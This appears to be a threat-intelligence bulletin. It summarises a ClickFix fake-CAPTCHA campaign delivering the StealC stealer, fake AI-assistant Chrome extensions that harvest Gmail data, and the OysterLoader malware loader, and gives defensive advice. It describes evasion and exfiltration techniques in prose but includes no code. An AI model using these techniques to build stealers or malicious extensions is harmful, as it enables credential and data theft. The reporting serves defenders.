Update: ClickFix CAPTCHA Lures Deliver Fileless StealC Credential-Stealing Chain
Security researchers uncovered a ClickFix social engineering campaign that uses fake CAPTCHA prompts to trick Windows users into executing malicious PowerShell commands, ultimately deploying the StealC information stealer. The attack begins when a user visits a compromised website, which loads a malicious script and displays a Cloudflare-style verification page instructing the victim to paste and run a command from their clipboard. That command launches a multi-stage, fileless infection chain that downloads shellcode, reflectively loads a PE downloader, and injects the final StealC payload into a legitimate Windows process such as svchost[.]exe. StealC then harvests browser credentials, cryptocurrency wallets, email accounts, system information, and screenshots before exfiltrating the data over RC4-encrypted HTTP traffic. The malware operates without persistence, executes largely in memory, and deletes itself after completing data theft, reducing forensic artifacts and complicating detection. By leveraging reflective loading, process injection, and encrypted command-and-control communications, the infection chain bypasses many disk-based and signature-based security controls. StealC’s modular architecture allows it to target multiple data sources, including Chromium and Firefox browsers, cryptocurrency wallets, Steam accounts, and Outlook credentials, making it especially dangerous for both enterprise and personal systems. Telemetry from multiple campaigns shows frequent rotation of domains, loader scripts, and PowerShell command structures, indicating an affiliate-driven distribution model rather than a single operator. The use of clipboard-based execution also reduces the need for exploit kits or malicious attachments, allowing the campaign to bypass many email and web filtering controls that rely on file reputation. The use of clipboard-based commands and CAPTCHA pages that look trusted also removes the need for traditional malware downloads, shifting the final execution step to the user. Organizations should prioritize user awareness around fake verification prompts, restrict PowerShell execution where possible, and deploy behavioral monitoring to detect fileless activity, process injection, and unusual credential access patterns.
AiFrame” Campaign Uses Fake AI Assistant Extensions to Harvest Browser and Gmail Data
Researchers at Layer X Security uncovered a coordinated campaign involving at least 30 malicious Chrome extensions posing as AI assistants for chat, summarization, writing, and Gmail support, impacting more than 260,000 users. Although the extensions appeared legitimate and even received featured placement in the Chrome Web Store, they shared the same codebase, permissions, and backend infrastructure, indicating a single coordinated operation. Instead of implementing AI functionality locally, the extensions injected full-screen remote iframes that loaded interfaces from attacker-controlled servers, allowing operators to silently change behavior without store updates or user prompts. Through this architecture, the extensions acted as privileged proxies, extracting page content, metadata, and other sensitive data from active browser tabs and transmitting it to external infrastructure. This meant operators could dynamically introduce new data collection logic or surveillance features long after the extension was installed. This model also enables rapid infrastructure rotation, making traditional block-list and signature-based extension detection less effective over time. A subset of the extensions specifically targeted Gmail, injecting scripts that read visible email threads and draft content directly from the browser’s DOM before sending that data off-device to attacker-controlled servers. The campaign relied on “extension spraying” tactics, where identical extensions were republished under new names and IDs after takedowns to maintain persistence and reputation in the store. All variants communicated with infrastructure under the tapnetic[.]pro domain, using themed subdomains to match the impersonated AI brand and reduce the impact of blocking a single endpoint. This design effectively turned the extensions into remote-controlled surveillance tools that could evolve after installation and bypass traditional review processes. Because the extensions relied on remote-loading interfaces, operators could push entirely new functionality or data-collection routines without triggering Chrome Web Store update reviews, effectively turning the extensions into persistent remote-access channels inside the browser. This model also enables rapid infrastructure rotation, making traditional block-list and signature-based extension detection less effective over time. Organizations should audit installed browser extensions, restrict high-risk permissions, and remove any AI-branded tools that rely on remote-hosted interfaces or unknown backend services.
Update: OysterLoader Multi-Stage Loader Linked to Rhysida Ransomware Campaigns
OysterLoader, also known as Broomstick or CleanUp, is a multi-stage C++ malware loader used in campaigns tied to the Rhysida ransomware group and other commodity malware operations. The threat is commonly distributed through fake software download sites that impersonate trusted IT tools such as PuTTY, WinSCP, or authentication utilities, often delivering a signed MSI installer to appear legitimate. Once executed, the infection chain progresses through four stages, including a packer with anti-debugging traps, custom shellcode using modified LZMA compression, and a downloader that retrieves additional payloads from command-and-control infrastructure. The loader employs techniques such as API hammering, dynamic API hashing, steganographic payload delivery, and custom Base64 encoding to evade static detection and network monitoring. These layered techniques allow the malware to remain difficult to analyze while maintaining reliable delivery of follow-on payloads. In later stages, the malware performs environment checks, establishes persistence through scheduled tasks, and communicates with multiple hardcoded C2 servers using disguised HTTP traffic. The final stage exfiltrates system information, retrieves additional payloads, and can deliver infostealers like Vidar or facilitate ransomware deployment. Its evolving infrastructure, multi-tiered C2 design, and custom data encoding mechanisms indicate an actively maintained toolset with ongoing development. Analysis of recent samples shows frequent changes to command-and-control endpoints and encoding schemes, suggesting active development and operational use across multiple campaigns rather than a single deployment. Its role as a flexible delivery mechanism means it can be repurposed to drop different payload families, making early-stage detection critical to preventing downstream ransomware or credential-theft incidents. The loader’s use of fake software installers and legitimate-looking infrastructure makes it particularly effective in enterprise environments where users routinely download IT tools. Organizations should restrict software installation sources, monitor for suspicious scheduled tasks or abnormal HTTP beaconing, and deploy behavioral detection controls capable of identifying multi-stage loader activity before ransomware or secondary malware is deployed.
Top CVEs of the Week
Top CVEs of the Week – As part of our ongoing vulnerability monitoring, the following CVEs highlight recent security issues that could affect a range of systems, applications, and devices. These findings reflect the constantly evolving threat landscape and reinforce the importance of timely patching, secure configurations, and proactive security practices. Below is a summary of notable vulnerabilities, including their impact and any available remediation guidance.
